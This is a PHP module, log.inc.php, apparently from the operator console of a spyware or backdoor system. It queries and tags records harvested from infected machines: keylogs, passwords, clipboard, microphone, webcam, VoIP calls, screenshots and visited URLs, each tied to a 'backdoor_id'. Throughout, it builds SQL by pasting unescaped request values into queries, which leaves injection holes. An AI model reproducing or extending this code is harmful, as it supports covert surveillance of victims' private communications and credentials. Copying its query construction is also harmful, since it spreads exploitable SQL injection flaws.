<?php

//////////
///
///   log.inc.php
///
//////////

require_once('lib/commons.inc.php');

require_once('methods/log/log_chat.inc.php');
require_once('methods/log/log_clipboard.inc.php');
require_once('methods/log/log_download.inc.php');
require_once('methods/log/log_filecap.inc.php');
require_once('methods/log/log_fileopen.inc.php');
require_once('methods/log/log_keylog.inc.php');
require_once('methods/log/log_mic.inc.php');
require_once('methods/log/log_password.inc.php');
require_once('methods/log/log_print.inc.php');
require_once('methods/log/log_snapshot.inc.php');
require_once('methods/log/log_upload.inc.php');
require_once('methods/log/log_url.inc.php');
require_once('methods/log/log_voip.inc.php');
require_once('methods/log/log_webcam.inc.php');



/*************\
*   METHODS   *
\*************/

$dm['log.count'] = array('func'   => 'log_count',
                         'perm'   => AL_VIEW,
                         'escape' => true);

$dm['log.get']   = array('func'   => 'log_get',
                         'perm'   => AL_VIEW,
                         'escape' => true);

$dm['log.tag']   = array('func'   => 'log_tag',
                         'perm'   => AL_VIEW,
                         'escape' => true);



/***************\
*   FUNCTIONS   *
\***************/

function log_count($search)
{
   $sql  = "SELECT COUNT(`log_id`) AS `count` ";
   $sql .= "FROM `log` ";
   $sql .= "WHERE `backdoor_id` IN ('".implode("', '", $_SESSION['authbackdoorid'])."') ";
   foreach(array('tag', 'type', 'backdoor_id') as $field) {
      if(isset($search[$field]) && is_array($search[$field]) && count($search[$field])) {
         $sql .= "AND `$field` IN ('".implode("', '", $search[$field])."') ";
      }
   }
   foreach(array('received', 'acquired') as $field) {
      if(isset($search[$field]) && is_array($search[$field])) {
         $sql .= "AND (0";
         foreach($search[$field] as $s) {
            $sql .= " OR `$field` BETWEEN '".str_replace(':', '', $s['begin']->scalar)."' AND '".str_replace(':', '', $s['end']->scalar)."'";
         }
         $sql .= ") ";
      }
   }
   foreach(array('remoteip', 'remotehost', 'remoteuser', 'varchar1', 'varchar2', 'varchar3', 'varchar4', 'longtext1') as $field) {
      if(isset($search[$field]) && is_array($search[$field])) {
         $sql .= "AND (0";
         foreach($search[$field] as $s) {
            $sql .= " OR `$field` LIKE '%".$s."%'";
         }
         $sql .= ") ";
      }
   }
   foreach(array('int1', 'int2', 'int3') as $field) {
      if(isset($search[$field]) && is_array($search[$field])) {
         $sql .= "AND (0";
         foreach($search[$field] as $s) {
            $sql .= " OR `$field` BETWEEN '".$s['min']."' AND '".$s['max']."'";
         }
         $sql .= ") ";
      }
   }

   $ret = db_query($sql);

   if(!is_success($ret)) {
      return $ret;
   }

   return success((integer)$ret['payload'][0]->count);
}

function log_get($search, $offset, $count)
{
   settype($offset, 'integer');
   settype($count, 'integer');

   $sql  = "SELECT `log_id`, ";
   $sql .=        "`tag`, ";
   $sql .=        "`type`, ";
   $sql .=        "`flags`, ";
   $sql .=        "`backdoor_id`, ";
   $sql .=        "`remoteip`, ";
   $sql .=        "`remotehost`, ";
   $sql .=        "`remoteuser`, ";
   $sql .=        "`received`, ";
   $sql .=        "`acquired`, ";
   $sql .=        "`varchar1`, ";
   $sql .=        "`varchar2`, ";
   $sql .=        "`varchar3`, ";
   $sql .=        "`varchar4`, ";
   $sql .=        "`int1`, ";
   $sql .=        "`int2`, ";
   $sql .=        "`int3`, ";
   $sql .=        "`longtext1`, ";
   $sql .=        "COUNT(`note_id`) AS `notes` ";
   $sql .= "FROM `log` ";
   $sql .= "LEFT JOIN `note` ";
   $sql .= "USING (`log_id`) ";
   $sql .= "WHERE `backdoor_id` IN ('".implode("', '", $_SESSION['authbackdoorid'])."') ";
   foreach(array('log_id', 'tag', 'type', 'backdoor_id') as $field) {
      if(isset($search[$field]) && is_array($search[$field]) && count($search[$field])) {
         $sql .= "AND `$field` IN ('".implode("', '", $search[$field])."') ";
      }
   }
   foreach(array('received', 'acquired') as $field) {
      if(isset($search[$field]) && is_array($search[$field])) {
         $sql .= "AND (0";
         foreach($search[$field] as $s) {
            $sql .= " OR `$field` BETWEEN '".str_replace(':', '', $s['begin']->scalar)."' AND '".str_replace(':', '', $s['end']->scalar)."'";
         }
         $sql .= ") ";
      }
   }
   foreach(array('remoteip', 'remotehost', 'remoteuser', 'varchar1', 'varchar2', 'varchar3', 'varchar4', 'longtext1') as $field) {
      if(isset($search[$field]) && is_array($search[$field])) {
         $sql .= "AND (0";
         foreach($search[$field] as $s) {
            $sql .= " OR `$field` LIKE '%".$s."%'";
         }
         $sql .= ") ";
      }
   }
   foreach(array('int1', 'int2', 'int3') as $field) {
      if(isset($search[$field]) && is_array($search[$field])) {
         $sql .= "AND (0";
         foreach($search[$field] as $s) {
            $sql .= " OR `$field` BETWEEN '".$s['min']."' AND '".$s['max']."'";
         }
         $sql .= ") ";
      }
   }
   $sql .= "GROUP BY `log_id` ";
   $sql .= "ORDER BY `acquired` DESC ";
   $sql .= "LIMIT $offset, $count";

   $ret = db_query($sql);

   if(!is_success($ret)) {
      return $ret;
   } else if($ret['payload'] === false) {
      return success(array());
   }

   return $ret;
}

function log_tag($log_id, $tag)
{
   foreach($log_id as $l) {
      $sql  = "SELECT `tag`, ";
      $sql .=        "`type`, ";
      $sql .=        "`backdoor_id` ";
      $sql .= "FROM `log` ";
      $sql .= "WHERE `log_id` = '$l' AND ";
      $sql .=       "`backdoor_id` IN ('".implode("', '", $_SESSION['authbackdoorid'])."')";

      $ret = db_query($sql);

      if(!is_success($ret)) {
         return $ret;
      }

      $delta = 0;

      if($tag == 0) {
         $delta++;
      }

      if($ret['payload'][0]->tag == 0) {
         $delta--;
      }

      $type = strtolower($ret['payload'][0]->type);
      $backdoor_id = $ret['payload'][0]->backdoor_id;

      $sql  = "UPDATE `log` ";
      $sql .= "SET `tag` = '$tag' ";
      $sql .= "WHERE `log_id` = '$l' AND ";
      $sql .=       "`backdoor_id` IN ('".implode("', '", $_SESSION['authbackdoorid'])."')";

      $ret = db_query($sql);

      if(!is_success($ret)) {
         return $ret;
      }

      if($delta) {
         $sql  = "UPDATE `stat` ";
         $sql .= "SET `{$type}_new` = `{$type}_new` + $delta ";
         $sql .= "WHERE `backdoor_id` = '$backdoor_id'";

         $ret = db_query($sql);

         if(!is_success($ret)) {
            return $ret;
         }
      }
   }

   return(success(true));
}

?>
